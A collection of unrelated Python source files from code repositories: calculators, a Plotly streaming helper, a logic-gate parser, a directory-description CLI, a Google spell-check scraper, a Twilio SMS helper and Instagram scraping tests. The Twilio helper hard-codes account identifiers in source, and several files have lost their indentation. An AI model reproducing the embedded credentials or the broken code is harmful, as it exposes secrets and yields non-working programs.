Sets up plotly graph to write to
:param points: <int> of max number of points to keep plotted on graph
:return: Plotly Stream object
'''
# Setup plotly
stream_ids = tls.get_credentials_file()['stream_ids']
# Get stream id from stream id list
stream_id = stream_ids[0]
# Make instance of stream id object
stream_1 = go.Stream(
token=stream_id, # link stream id to 'token' key
        maxpoints=points  # keep at most 'points' points on screen
)
# Initialize trace of streaming plot by embedding the unique stream_id
trace1 = go.Scatter(
x=[],
y=[],
mode='lines',
stream=stream_1 # (!) embed stream id, 1 per trace
)
data = go.Data([trace1])
# Add title to layout object
layout = go.Layout(
title='Twitter Overwatch Sentiment',
xaxis=dict(
title='Date & Time',
titlefont=dict(
size=18,
color='#7f7f7f'
)
),
yaxis=dict(
title='Aggregate Sentiment',
titlefont=dict(
size=18,
color='#7f7f7f'
)
)
)
# Make a figure object
fig = go.Figure(data=data, layout=layout)
# Send fig to Plotly, initialize streaming plot, open new tab
py.iplot(fig, filename='python-streaming')
# We will provide the stream link object the same token that's associated with the trace we wish to stream to
stream_object = py.Stream(stream_id)
# We then open a connection
stream_object.open()
time.sleep(5)
return stream_object
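# Editor's note - illustrative usage only (requires valid plotly credentials with at
# least one configured stream id, so it is left commented out; the values are placeholders):
# stream = setupPlotly(80)
# stream.write(dict(x="2017-01-01 00:00:00", y=3))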
``` |
{
"source": "JOkendo/PythonPrograms",
"score": 4
} |
#### File: JOkendo/PythonPrograms/globalcalc.py
```python
def help_screen():
    print("A: Adds n and m\n"
          "S: Subtracts n from m\n"
          "M: Multiplies n and m\n"
          "D: Divides n by m\n"
          "H: Displays this help screen\n"
          "Q: Quits the program")
def menu():
return input("\
A: \
S: \
M: \
D: \
H: \
Q: \
")
results = 0.0
n = 0
m = 0
def get_input():
global n , m
n = int(input("Enter n: "))
m = int(input("Enter m: "))
def report():
print(results)
def add():
global results
results = n + m
def sub():
global results
    # subtract the smaller operand from the larger so the result is never negative
    if n > m:
        results = n - m
    else:
        results = m - n
def mul():
global results
results = n * m
def div():
global results
    if m != 0:  # guard against division by zero
results = n / m
def main():
done = False
while not done:
choice = menu()
if choice == 'A' or choice == 'a':
get_input()
add()
report()
elif choice == 'S' or choice == 's':
get_input()
sub()
report()
elif choice == 'M' or choice == 'm':
get_input()
mul()
report()
elif choice == 'D' or choice == 'd':
get_input()
div()
report()
elif choice == 'H' or choice == 'h':
help_screen()
elif choice == 'Q' or choice == 'q':
done = True
main()
```
#### File: JOkendo/PythonPrograms/GUICalc.py
```python
from tkinter import *
class GUICalc:
    def __init__(self, v1, v2):
        # keep the operands as plain numbers so the arithmetic methods below work
        self.v1 = v1
        self.v2 = v2
        window = Tk()
        window.title("GUI Calculator")
        frame1 = Frame(window)
        frame1.pack()
        # Entry has no "variable"/"command" options; bind an IntVar through textvariable instead
        self.entry_var = IntVar(value=v1)
        entry = Entry(frame1, textvariable=self.entry_var)
        entry.pack()
        window.mainloop()
def setV1(self, v1):
self.v1 = v1
def setV2(self, v2):
self.v2 = v2
def add(self):
result = self.v1 + self.v2
print("Sum = ", result)
return result
def sub(self):
if self.v2 < self.v1:
result = self.v1 - self.v2
print("Difference = ", result)
return result
else:
result1 = self.v2 - self.v1
print("Difference = ", result1)
return result1
def mul(self):
result = self.v1 * self.v2
print("Product = ", result)
return result
def divi(self):
        if self.v2 != 0:  # guard against division by zero
result = self.v1 / self.v2
print("Division = ", result)
return result
def mod(self):
result = self.v1 % self.v2
print("Remainder = ", result)
return result
def main():
calc = GUICalc(2, 3)
calc.add()
calc.sub()
calc.mul()
calc.divi()
calc.mod()
main()
``` |
{
"source": "JOkendo/pyTopical",
"score": 3
} |
#### File: pyTopical/iterations/iterativefact.py
```python
def factorial(n):
product = 1
while n:
product *= n
n -= 1
return product
def main():
print(factorial(10))
main()
```
#### File: pyTopical/strings/string.py
```python
import sys
def isPalindrome(s):
low = 0
high = len(s) - 1
while low < high:
if s[low] != s[high]:
return False
low += 1
high -= 1
return True
def main():
done = False
while not done:
an = input("Y or N: ")
if an == 'y':
s = input("Enter s: ").strip()
if isPalindrome(s):
print(s, " \"is a palindrome\" ")
else:
print(s, " \"is not a palindrome\" ")
elif an == 'n':
done = True
main()
```
#### File: pyTopical/tuples/arbitargs.py
```python
def sum(*num):
result = 0
for n in num:
result += n
return result
s = sum(*(2,3,4,5))
print(s)
tpl = 1,2,3,4,5,6,7
#Demonstrate general unpacking; this also happens with lists
t, p, *rest = tpl
print(t)
print(p)
print(*rest) #Print just the list elements
``` |
{
"source": "JokeNeverSoke/logick",
"score": 4
} |
#### File: logick/logick/display.py
```python
from __future__ import annotations
def get_string_table(table: list[list[str]], headings: None | list[str] = None) -> str:
"""Consume table and create an ascii table
If no headings are provided, the heading row would not be printed.
Example return:
+---------+---------+
| a | b |
+---------+---------+
| 1 | 2 |
| i justd | 1231244 |
+---------+---------+
"""
# assume height is 1 for all rows
# get the needed width of each column
widths: list[int] = [0] * len(table[0])
for row in table:
for i, col in enumerate(row):
widths[i] = max(widths[i], len(col))
# also reference heading lengths
if headings:
for i, col in enumerate(headings):
widths[i] = max(widths[i], len(col))
# build the string
s: str = ""
horizontal_line = "+" + "".join(["-" * (w + 2) + "+" for w in widths]) + "\n"
s += horizontal_line
if headings is not None:
s += (
"|"
+ "".join(
[
" " + heading.ljust(widths[i]) + " |"
for i, heading in enumerate(headings)
]
)
+ "\n"
)
s += horizontal_line
for row in table:
s += "|"
for i, col in enumerate(row):
s += " " + col.ljust(widths[i] + 1) + "|"
s += "\n"
s += horizontal_line
return s
def pt(*args, **kwargs):
print(get_string_table(*args, **kwargs), end="")
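# Editor's addition - a minimal usage sketch, not part of the original module:
if __name__ == "__main__":
    # prints a small 2x2 table similar to the docstring example, with headings "a" and "b"
    pt([["1", "2"], ["i justd", "1231244"]], headings=["a", "b"])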
```
#### File: logick/logick/gates.py
```python
class Gate:
def __init__(self):
pass
    def __call__(self, *args, **kwargs) -> bool:
        # forward keyword arguments as well, since the do() overrides accept **kwargs
        o = self.do(*args, **kwargs)
return o
def __repr__(self) -> str:
return "<Gate>"
def __str__(self):
return "<Gate>"
def __eq__(self, __o: object) -> bool:
raise NotImplementedError
def find_terminal_inputs(self) -> list["INPUT"]:
"""Find all terminal inputs, does not remove duplicates"""
raise NotImplementedError
def do(self, *args):
raise NotImplementedError
class OneGate(Gate):
a: Gate
def __repr__(self):
return f"<{type(self).__name__}({repr(self.a)})>"
def __str__(self):
return f"({type(self).__name__} {self.a})"
def __hash__(self) -> int:
return hash(f"gate-{type(self).__name__}-{hash(self.a)}")
def __eq__(self, __o: object) -> bool:
if not isinstance(__o, OneGate):
return False
if type(self) != type(__o):
return False
return self.a == __o.a
def find_terminal_inputs(self) -> list["INPUT"]:
return self.a.find_terminal_inputs()
class TwoGate(Gate):
a: Gate
b: Gate
def __repr__(self):
return f"<{type(self).__name__}({repr(self.a)}, {repr(self.b)})>"
def __str__(self):
return f"({self.a} {type(self).__name__} {self.b})"
def __hash__(self) -> int:
return hash(f"gate-{type(self).__name__}-{hash(self.a)}-{hash(self.b)}")
def __eq__(self, __o: object) -> bool:
if not isinstance(__o, TwoGate):
return False
if type(self) != type(__o):
return False
return (self.a == __o.a and self.b == __o.b) or (
self.a == __o.b and self.b == __o.a
)
def find_terminal_inputs(self) -> list["INPUT"]:
return self.a.find_terminal_inputs() + self.b.find_terminal_inputs()
class AND(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return self.a(**kwargs) and self.b(**kwargs)
class OR(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return self.a(**kwargs) or self.b(**kwargs)
class NOT(OneGate):
def __init__(self, a: Gate):
super().__init__()
self.a = a
def do(self, **kwargs):
return not self.a(**kwargs)
class NAND(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return not (self.a(**kwargs) and self.b(**kwargs))
class NOR(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return not (self.a(**kwargs) or self.b(**kwargs))
class XOR(TwoGate):
def __init__(self, a: Gate, b: Gate):
super().__init__()
self.a = a
self.b = b
def do(self, **kwargs):
return self.a(**kwargs) != self.b(**kwargs)
class INPUT(Gate):
def __init__(self, name: str):
super().__init__()
self.current: bool = False
self.name = name
def __repr__(self):
return f"<INPUT {self.name}>"
def __str__(self):
return self.name
def __hash__(self) -> int:
return hash(f"gate-input-{self.name}")
def __eq__(self, __o: object) -> bool:
return hash(self) == hash(__o)
def __lt__(self, __o: object) -> bool:
if not isinstance(__o, INPUT):
return False
return self.name < __o.name
def find_terminal_inputs(self) -> list["INPUT"]:
return [self]
def do(self, **kwargs):
return self.current
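# Editor's addition - a minimal usage sketch, not part of the original module:
if __name__ == "__main__":
    # build A AND (NOT B); INPUT terminals are evaluated from their `current` field
    _a, _b = INPUT("A"), INPUT("B")
    _expr = AND(_a, NOT(_b))
    _a.current, _b.current = True, False
    assert _expr() is True
    print(_expr)  # prints (A AND (NOT B))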
```
#### File: logick/logick/parse.py
```python
from __future__ import annotations
from lark import Lark, Transformer
from . import gates as g
from .controller import Controller
OPERATORS = {
"AND": g.AND,
"OR": g.OR,
"XOR": g.XOR,
"NOT": g.NOT,
"NAND": g.NAND,
"NOR": g.NOR,
}
PARSER = Lark(
r"""
?start: expression
expression: two_operation
| one_operation
| INPUT
| "(" expression ")"
two_operation: expression TWO_OPERATOR one_operation
| expression TWO_OPERATOR INPUT
| expression TWO_OPERATOR "(" expression ")"
one_operation: ONE_OPERATOR INPUT
| ONE_OPERATOR "(" expression ")"
ONE_OPERATOR: "NOT"
TWO_OPERATOR: "AND" | "OR" | "XOR" | "NAND" | "NOR"
INPUT: /[A-Z]/
%import common.WS
%ignore WS
""",
start="start",
)
class LogicTransformer(Transformer):
def INPUT(self, args: list[str]) -> g.INPUT:
name = args[0]
return g.INPUT(name)
def ONE_OPERATOR(self, args: str) -> g.Gate:
return OPERATORS[args]
def one_operation(self, args: tuple[type, g.Gate]) -> g.Gate:
return args[0](args[1])
def TWO_OPERATOR(self, args: str) -> g.Gate:
return OPERATORS[args]
def two_operation(self, args: tuple[g.Gate, type, g.Gate]) -> g.Gate:
return args[1](args[0], args[2])
def expression(self, args: tuple[g.Gate]) -> g.Gate:
return args[0]
def parse(statement: str):
"""Parse logic string into structured gate into list of gates
Inputs must be capital letters
"""
tree = PARSER.parse(statement)
tf = LogicTransformer()
out: g.Gate = tf.transform(tree)
return out
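# Editor's addition - a minimal usage sketch, not part of the original module:
if __name__ == "__main__":
    # parses into a nested Gate tree and prints it via the gates' __str__ methods,
    # e.g. something like (A AND (B OR (NOT C)))
    print(parse("A AND (B OR NOT C)"))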
```
#### File: logick/logick/test_parse.py
```python
from .gates import *
from .parse import *
from .utils import inputs
def test_parsing():
A, B, Z = inputs("A B Z")
# inputs
assert parse("A") == A
assert parse("B") == B
assert parse("Z") == Z
# simple expressions
assert parse("A AND A") == AND(A, A)
assert parse("A NAND A") == NAND(A, A)
assert parse("A OR A") == OR(A, A)
assert parse("A NOR A") == NOR(A, A)
assert parse("A XOR A") == XOR(A, A)
assert parse("NOT A") == NOT(A)
# left recursion order
assert parse("A AND A OR A") == OR(AND(A, A), A)
assert parse("A AND (A OR A)") == AND(A, OR(A, A))
assert parse("A OR A AND (A)") == AND(OR(A, A), A)
assert parse("A OR (A AND A)") == OR(A, AND(A, A))
assert parse("NOT A AND B") == AND(NOT(A), B)
assert parse("NOT (A AND B)") == NOT(AND(A, B))
assert parse("A AND A AND A") == AND(AND(A, A), A)
assert parse("A AND A AND A AND A") == AND(AND(AND(A, A), A), A)
assert parse("A OR A OR A") == OR(OR(A, A), A)
assert parse("A OR A OR A OR A") == OR(OR(OR(A, A), A), A)
# super long expressions
assert parse("A AND (B XOR Z) OR (NOT A NAND B)") == OR(
AND(A, XOR(B, Z)), NAND(NOT(A), B)
)
assert parse("((((NOT A) NOR B) XOR A) AND B)") == AND(XOR(NOR(NOT(A), B), A), B)
def test_parse_tree():
(A,) = inputs("A")
u = parse("A AND A")
trace = Controller([u]).get_trace()
assert trace[{A: 0}] == {u: False}
assert trace[{A: 1}] == {u: True}
``` |
{
"source": "JokeNeverSoke/poets",
"score": 3
} |
#### File: poets/poetspy/generate.py
```python
import json
import os
import sys
from pathlib import Path
import click
@click.command(short_help="Change title")
@click.argument("title", nargs=-1, required=True)
def title(title):
"""Modify the title of the current structure in .poets.json"""
t = " ".join(title)
p = Path("./.poets.json")
if p.exists():
if p.is_dir():
click.secho(".poets.json is a directory!", fg="red")
sys.exit(1)
k = json.load(p.open())
k["title"] = t
else:
k = {"title": t}
json.dump(k, p.open("w"))
click.echo(
click.style("title set to", fg="blue")
+ " "
+ click.style(t, fg="blue", underline=True)
)
@click.command(short_help="Change description")
@click.argument("des", nargs=-1, required=True)
def des(des):
"""Modify the description of the current structure in .poets.json"""
t = " ".join(des)
p = Path("./.poets.json")
if p.exists():
if p.is_dir():
click.secho(".poets.json is a directory!", fg="red")
sys.exit(1)
k = json.load(p.open())
k["subtitle"] = t
else:
k = {"subtitle": t}
json.dump(k, p.open("w"))
click.echo(
click.style("description set to", fg="blue")
+ " "
+ click.style(t, fg="blue", underline=True)
)
@click.group()
def main():
"""Placeholder for subcommands"""
pass
main.add_command(title)
main.add_command(des)
if __name__ == "__main__":
main()
```
#### File: poets/poetspy/poets.py
```python
from __future__ import annotations
import json
import os
import re
import sys
import threading
from queue import Queue
from typing import Iterable, cast, TypedDict
import click
import marko
import marko.inline
import toml
from loguru import logger
LOGGING_LEVELS = [99, 50, 40, 30, 25, 20, 10, 5]
SOURCE_PACKAGE_JSON = "packageJson"
SOURCE_PROJECT_TOML = "pyprojectToml"
SOURCE_README_MD = "readmeMd"
SOURCE_README_RST = "readmeRst"
SOURCE_POETS_JSON = "poetsJson"
DESCRIPTION_SOURCE_PRIORITY = [
SOURCE_POETS_JSON,
SOURCE_PACKAGE_JSON,
SOURCE_PROJECT_TOML,
SOURCE_README_RST,
SOURCE_README_MD,
]
class Description(TypedDict):
title: str
subtitle: str
def file_to_string(path: str) -> str:
with open(path) as f:
return f.read()
def is_badge_line(node: marko.block.Paragraph) -> bool:
if not hasattr(node, "children"):
return False
for k in node.children:
if isinstance(k, marko.inline.LineBreak):
continue
elif isinstance(k, marko.inline.Link):
if (
k.children
and len(k.children) == 1
and isinstance(k.children[0], marko.inline.Image)
):
continue
else:
return True
elif isinstance(k, marko.inline.Image):
continue
elif not get_string_from_markdown_ast(k).strip():
continue
else:
logger.debug(
"found non-badge element {} {}", get_string_from_markdown_ast(k), k
)
return False
return True
def get_string_from_markdown_ast(
node: marko.inline.InlineElement
| str
| marko.block.Heading
| marko.block.SetextHeading,
base=0,
) -> str:
# run again on string
if isinstance(node, marko.inline.RawText):
k = get_string_from_markdown_ast(node.children, base + 1)
# use space to replace linebreaks in order to save space
elif isinstance(node, marko.inline.LineBreak):
k = " "
# skip image alt texts
elif isinstance(node, marko.inline.Image):
k = ""
# skip blocks
elif isinstance(node, (marko.block.LinkRefDef, marko.block.ThematicBreak)):
k = ""
elif isinstance(node, marko.block.BlankLine):
k = " "
elif isinstance(node, str):
k = node
else:
k = "".join([get_string_from_markdown_ast(t, base + 1) for t in node.children])
return k
def get_description_from_readmeMd(markdown: str) -> Description:
parser = marko.parser.Parser()
ast = cast(marko.block.BlockElement, parser.parse(markdown))
description: Description = {"title": "", "subtitle": ""}
for block in ast.children:
# skip blank lines
if isinstance(block, marko.block.BlankLine):
continue
# skip html stuff
# TODO: add html tag parsing
elif isinstance(block, marko.block.HTMLBlock):
continue
# skip lines with only images
elif is_badge_line(block):
continue
# read headings
# TODO: find title & subtitle on heading type (H1/H2/H3)
elif (
isinstance(block, (marko.block.Heading, marko.block.SetextHeading))
and block.children
):
if description["title"] != "":
continue
description["title"] = get_string_from_markdown_ast(block).strip()
# read descriptions
else:
description["subtitle"] = get_string_from_markdown_ast(block).strip()
logger.trace('read description "{}"', description["subtitle"])
break
return description
def get_description_from_packageJson(package: str) -> Description:
"""Gets description about a directory using its node package.json"""
v = json.loads(package)
description: Description = {"title": "", "subtitle": ""}
if "name" in v:
description["title"] = v["name"].strip()
logger.opt(colors=True).debug(
f"found name in package.json <u>{description['title']}</u>"
)
if "description" in v:
description["subtitle"] = v["description"].strip()
logger.opt(colors=True).debug(
f"found subtitle in package.json <u>{description['subtitle']}</u>"
)
return description
def get_description_from_pyprojectToml(string: str) -> Description:
meta = toml.loads(string)
description: Description = {"title": "", "subtitle": ""}
if "tool" in meta:
if "poetry" in meta["tool"]:
if "name" in meta["tool"]["poetry"]:
description["title"] = meta["tool"]["poetry"]["name"].strip()
logger.opt(colors=True).debug(
f"found name in poetry.toml <u>{description['title']}</u>"
)
if "description" in meta["tool"]["poetry"]:
description["subtitle"] = meta["tool"]["poetry"]["description"].strip()
logger.opt(colors=True).debug(
f"found description in poetry.toml <u>{description['subtitle']}</u>"
)
return description
def get_description_from_readmeRst(filestream) -> Description:
rx = re.compile(r"([\S])\1{3,}")
lastline = ""
while 1:
line = filestream.readline().strip()
if rx.match(line):
logger.opt(colors=True).debug(
f"found title line in readme.rst <u>{lastline}</u>"
)
return {"title": lastline, "subtitle": ""}
lastline = line
return {"title": "", "subtitle": ""}
def get_description_from_poetsJson(string) -> Description:
o = json.loads(string)
d: Description = {"title": "", "subtitle": ""}
if "title" in o:
d["title"] = o["title"]
if "subtitle" in o:
d["subtitle"] = o["subtitle"]
return d
def join_title_and_subtitle(d: Description, ansi: bool = False) -> str:
title, subtitle = d["title"], d["subtitle"]
final_description = ""
if title:
if ansi:
final_description += click.style(title, bold=True, underline=True)
else:
final_description += title
if subtitle:
if len(subtitle) > 82:
subtitle = subtitle[:82] + "..."
if final_description:
final_description += " - " + subtitle
else:
final_description += subtitle
return final_description
def get_dir_info(path: str) -> dict[str, Description]:
"""Get full description of dir `path`"""
p = os.listdir(path)
descriptions = {}
for i in p:
logger.trace(f"reading {i}")
if i.lower() == "readme.md":
descriptions[SOURCE_README_MD] = get_description_from_readmeMd(
file_to_string(os.path.join(path, i))
)
elif i.lower() == "package.json":
descriptions[SOURCE_PACKAGE_JSON] = get_description_from_packageJson(
file_to_string(os.path.join(path, i))
)
elif i.lower() == "pyproject.toml":
descriptions[SOURCE_PROJECT_TOML] = get_description_from_pyprojectToml(
file_to_string(os.path.join(path, i))
)
elif i.lower() == "readme.rst":
with open(os.path.join(path, i)) as f:
descriptions[SOURCE_README_RST] = get_description_from_readmeRst(f)
elif i.lower() == ".poets.json":
descriptions[SOURCE_POETS_JSON] = get_description_from_poetsJson(
file_to_string(os.path.join(path, i))
)
return descriptions
def filter_description(descriptions: dict[str, Description]) -> Description:
"""Uses the priority table to pick the best title and description"""
title = ""
subtitle = ""
for source in DESCRIPTION_SOURCE_PRIORITY:
if source in descriptions:
if "title" in descriptions[source]:
if descriptions[source]["title"]:
logger.debug(f"using {source} for title")
title = descriptions[source]["title"]
break
for source in DESCRIPTION_SOURCE_PRIORITY:
if source in descriptions:
if "subtitle" in descriptions[source]:
if descriptions[source]["subtitle"]:
logger.debug(f"using {source} for subtitle")
subtitle = descriptions[source]["subtitle"]
break
return {"title": title, "subtitle": subtitle}
def thread_worker(q: Queue, path, u, f=None) -> None:
while 1:
a = q.get()
logger.info(f"getting info for {a}")
descriptions = get_dir_info(os.path.join(path, a))
u[a + "/"] = filter_description(descriptions)
logger.info(f'info: {u[a+"/"]}')
q.task_done()
if f:
f.update(1)
def loop_dirs(
dirs: Iterable[str], path: str, thread: int, f=None
) -> dict[str, Description]:
u: dict[str, Description] = {}
if thread and thread > 0:
q = Queue()
for p in dirs:
q.put(p)
threads = []
for _ in range(thread):
worker = threading.Thread(
target=thread_worker, args=(q, path, u, f), daemon=True
)
worker.start()
threads.append(worker)
q.join()
else:
for a in dirs:
logger.info(f"getting info for {a}")
u[a + "/"] = filter_description(get_dir_info(os.path.join(path, a)))
logger.info(f'info: {u[a+"/"]}')
return u
# @logger.catch
@click.command(
help="A cli app to show directories with description. Works best with documented directories.",
add_help_option=False,
)
@click.argument("path", type=click.Path(exists=True, readable=True), default=".")
@click.option("--ansi/--no-ansi", default=True, help="Disable ansi colored output")
@click.option("--dry", "-D", default=False, is_flag=True, help="Gide final stdout")
@click.option("--progress/--no-progress", default=True, help="Disable progress bar")
@click.option("-v", "--verbose", count=True, help="Set logging level, repeat for more")
@click.option(
"-x", "--thread", type=int, default=0, help="Number of threads, 0 to disable"
)
@click.help_option("--help", "-h")
def main(ansi: bool, verbose: int, dry: bool, progress: bool, path: str, thread: int):
    if verbose >= len(LOGGING_LEVELS):
        verbose = len(LOGGING_LEVELS) - 1
logger_config = {
"handlers": [
{
"sink": sys.stdout,
"format": "<green>{time:HH:mm:ss.SSS}</green> - <lvl>{level}</lvl>: {message}",
"level": LOGGING_LEVELS[verbose],
},
],
}
logger.configure(**logger_config)
logger.info(f"ansi status: {ansi}")
logger.info(f"path: {path}")
dirs = [o for o in os.listdir(path) if os.path.isdir(os.path.join(path, o))]
if progress and not dry:
if thread:
with click.progressbar(length=len(dirs), label="Parsing directories") as f:
u = loop_dirs(dirs, path, thread, f)
else:
with click.progressbar(dirs, label="Parsing directories") as di:
u = loop_dirs(di, path, thread)
else:
u = loop_dirs(dirs, path, thread)
if not dry:
for l in sorted(u):
if len(u[l]) >= 1:
if ansi:
o = (
click.style(l, fg="blue")
+ " "
+ join_title_and_subtitle(u[l], ansi=ansi)
)
else:
o = l + " " + join_title_and_subtitle(u[l], ansi=ansi)
else:
if ansi:
o = click.style(l, fg="blue")
else:
o = l
click.echo(o)
if __name__ == "__main__":
main()
```
#### File: poets/tests/test_unit.py
```python
import io
import sys
import marko
import pytest
from fixtures import (
EXAMPLE_README_MD1,
EXAMPLE_README_MD2,
EXAMPLE_README_MD3,
EXAMPLE_README_MD4,
EXAMPLE_README_RST1,
EXAMPLE_POETS_JSON1,
)
from poetspy.poets import (
Description,
file_to_string,
get_description_from_readmeMd,
get_description_from_readmeRst,
get_description_from_poetsJson,
get_string_from_markdown_ast,
is_badge_line,
join_title_and_subtitle,
logger,
)
def test_readme_md():
assert get_description_from_readmeMd(EXAMPLE_README_MD1) == {
"title": "PoetsPy",
"subtitle": "A great python ls alternative",
}
assert get_description_from_readmeMd(EXAMPLE_README_MD2) == {
"title": "Title",
"subtitle": "this is just a random readme",
}
assert get_description_from_readmeMd(EXAMPLE_README_MD3) == {
"title": "Node.JS Chat",
"subtitle": "This is a node.js chat application powered by SockJS and Express that provides the main functions you'd expect from a chat, such as emojis, private messages, an admin system, etc.",
}
assert get_description_from_readmeMd(EXAMPLE_README_MD4) == {
"title": "Color LS",
"subtitle": "A Ruby script that colorizes the ls output with color and icons. Here are the screenshots of working example on an iTerm2 terminal (Mac OS), oh-my-zsh with powerlevel9k theme and powerline nerd-font + awesome-config font with the Solarized Dark color theme.",
}
def test_path_reader(tmp_path):
u = tmp_path / "test1.txt"
u.write_text("ABCDefgHijklmn")
assert file_to_string(str(u)) == "ABCDefgHijklmn"
v = tmp_path / "test2.txt"
v.write_text("happy birthday!你好!")
assert file_to_string(v) == "happy birthday!你好!"
def f(a, b) -> Description:
return {"title": a, "subtitle": b}
def test_title_selection(snapshot):
assert (
join_title_and_subtitle(f("Poetspy", "Another ls alternative"), False)
== "Poetspy - Another ls alternative"
)
assert (
join_title_and_subtitle(f("", "Another ls alternative"), False)
== "Another ls alternative"
)
assert (
join_title_and_subtitle(f("Poetspy", "j" * 99), False)
== "Poetspy - " + "j" * 82 + "..."
)
assert (
join_title_and_subtitle(f("Poetspy", "Another ls alternative"), True)
== snapshot
)
def test_poets_json():
assert get_description_from_poetsJson(EXAMPLE_POETS_JSON1) == {
"title": "Hanasu",
"subtitle": "A p2p chat app",
}
def test_readme_rst():
i = io.StringIO(EXAMPLE_README_RST1)
assert get_description_from_readmeRst(i) == {"title": "pingtop", "subtitle": ""}
def test_get_readme_text():
parser = marko.parser.Parser()
ast = parser.parse("**Hello** *World!*").children[0]
assert get_string_from_markdown_ast(ast) == "Hello World!"
ast = parser.parse(" ").children[0]
assert get_string_from_markdown_ast(ast) == " "
ast = parser.parse("Hello  *World!*").children[0]
assert get_string_from_markdown_ast(ast) == "Hello World!"
ast = parser.parse("Hello [link](ref) *World!*").children[0]
assert get_string_from_markdown_ast(ast) == "Hello link World!"
ast = parser.parse("# Hello [World!](there)").children[0]
assert get_string_from_markdown_ast(ast) == "Hello World!"
ast = parser.parse("Hello\n[World!](there)").children[0]
assert get_string_from_markdown_ast(ast) == "Hello World!"
# Line with no text is badge line
ast = parser.parse("![]() []()").children[0]
assert is_badge_line(ast) == True
# Images with alt text are badges
ast = parser.parse(" ").children[0]
assert is_badge_line(ast) == True
# Text between images is not badge line
ast = parser.parse(" some text").children[0]
assert is_badge_line(ast) == False
# Images with link is badge line
ast = parser.parse("[](other_source) ").children[0]
assert is_badge_line(ast) == True
# Empty line is not badge line
ast = parser.parse(" ").children[0]
assert is_badge_line(ast) == False
``` |
{
"source": "joker123098/Medicare",
"score": 2
} |
#### File: backend/diagnose/twilio.py
```python
import os
from twilio.rest import Client
def send_msg(tousr,body):
account_sid = 'SK7408a1a9c65e8f94ac82d0f0eef4075e'
auth_token = '<PASSWORD>'
client = Client(account_sid, auth_token)
message = client.messages \
.create(
body=body,
messaging_service_sid='MG9752274e9e519418a7406176694466fa',
to=tousr
)
print(message.sid)
``` |
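The credentials in the module above are hard-coded; a safer pattern, sketched here under the assumption of conventional environment-variable names (they are placeholders, not part of the project), is to read them from the environment. The phone number and message body are also made up.

```python
# Sketch only: read Twilio credentials from the environment instead of the source file.
import os
from twilio.rest import Client

account_sid = os.environ["TWILIO_ACCOUNT_SID"]            # hypothetical variable names
auth_token = os.environ["TWILIO_AUTH_TOKEN"]
client = Client(account_sid, auth_token)

message = client.messages.create(
    body="Your appointment is confirmed.",
    messaging_service_sid=os.environ["TWILIO_MESSAGING_SERVICE_SID"],
    to="+15551234567",
)
print(message.sid)
```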
{
"source": "joker153/amalpromass",
"score": 3
} |
#### File: joker153/amalpromass/spell.py
```python
import urllib.parse
import re
from bs4 import BeautifulSoup as bs
import requests
def Check(q):
    raw_query = q  # preserve the original string to return if an error is caught
    q = q.lower().strip()
url = "http://www.google.com/search?q=" + urllib.parse.quote(q)
source=requests.get(url).text
soup=bs(source,'lxml')
ans = soup.find('a', attrs={'class' : 'spell'})
try:
result = repr(ans.contents)
result = result.replace("u'","")
result = result.replace("/","")
result = result.replace("<b>","")
result = result.replace("<i>","")
        result = re.sub(r'[^A-Za-z0-9\s]+', '', result)
result = re.sub(' +',' ',result)
except AttributeError:
result = raw_query
return result
``` |
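A quick usage sketch for `Check` above; note that it scrapes Google's HTML, so the output depends on the live page markup and falls back to the raw query when no `spell` element is found. The import path is an assumption.

```python
# Hypothetical usage of the scraper above; output depends on Google's current markup.
from spell import Check  # assumed module name

print(Check("recieve the pacakge"))  # ideally a corrected suggestion, otherwise the raw query
```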
{
"source": "joker2017/InstaParser",
"score": 2
} |
#### File: InstaParser/tests/anon.py
```python
import pytest
from random import randint, choice
from instaparser.agents import Agent
from instaparser.entities import Account, Media, Location, Tag
from tests.settings import accounts, locations, photos, photo_sets, tags, videos
def test_update():
anon = Agent()
anon.update()
assert(not getattr(anon, "_rhx_gis", None) is None)
assert(not getattr(anon, "_csrf_token", None) is None)
@pytest.mark.parametrize("username", accounts)
def test_update_account(username):
anon = Agent()
account = Account(username)
data = anon.update(account)
assert(not data is None)
assert(not account.id is None)
assert(not account.full_name is None)
assert(not account.profile_pic_url is None)
assert(not account.profile_pic_url_hd is None)
assert(not account.biography is None)
assert(not account.follows_count is None)
assert(not account.followers_count is None)
assert(not account.media_count is None)
assert(not account.is_private is None)
assert(not account.is_verified is None)
assert(not account.country_block is None)
Account.clear_cache()
@pytest.mark.parametrize("shortcode", photos)
def test_update_photo(shortcode):
anon = Agent()
photo = Media(shortcode)
data = anon.update(photo)
assert(not photo.is_video)
Media.clear_cache()
@pytest.mark.parametrize("shortcode", photo_sets)
def test_update_photo_set(shortcode):
anon = Agent()
photo_set = Media(shortcode)
data = anon.update(photo_set)
assert(not photo_set.is_video)
Media.clear_cache()
@pytest.mark.parametrize("shortcode", videos)
def test_update_video(shortcode):
anon = Agent()
video = Media(shortcode)
data = anon.update(video)
assert(video.is_video)
Media.clear_cache()
@pytest.mark.parametrize("id", locations)
def test_update_location(id):
anon = Agent()
location = Location(id)
data = anon.update(location)
Location.clear_cache()
@pytest.mark.parametrize("name", tags)
def test_update_tag(name):
anon = Agent()
tag = Tag(name)
data = anon.update(tag)
Tag.clear_cache()
@pytest.mark.parametrize("count,username",
[(randint(100, 500), choice(accounts)) for i in range(3)])
def test_get_media_account(count, username):
anon = Agent()
account = Account(username)
data, pointer = anon.get_media(account, count=count)
assert(min(account.media_count, count) == len(data))
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,id", [(randint(100, 500), choice(locations)) for i in range(3)])
def test_get_media_location(count, id):
anon = Agent()
location = Location(id)
data, pointer = anon.get_media(location, count=count)
assert(min(location.media_count, count) == len(data))
assert((pointer is None) == (location.media_count <= count))
Location.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,name", [(randint(100, 500), choice(tags)) for i in range(3)])
def test_get_media_tag(count, name):
anon = Agent()
tag = Tag(name)
data, pointer = anon.get_media(tag, count=count)
assert(min(tag.media_count, count) == len(data))
assert((pointer is None) == (tag.media_count <= count))
Tag.clear_cache()
Media.clear_cache()
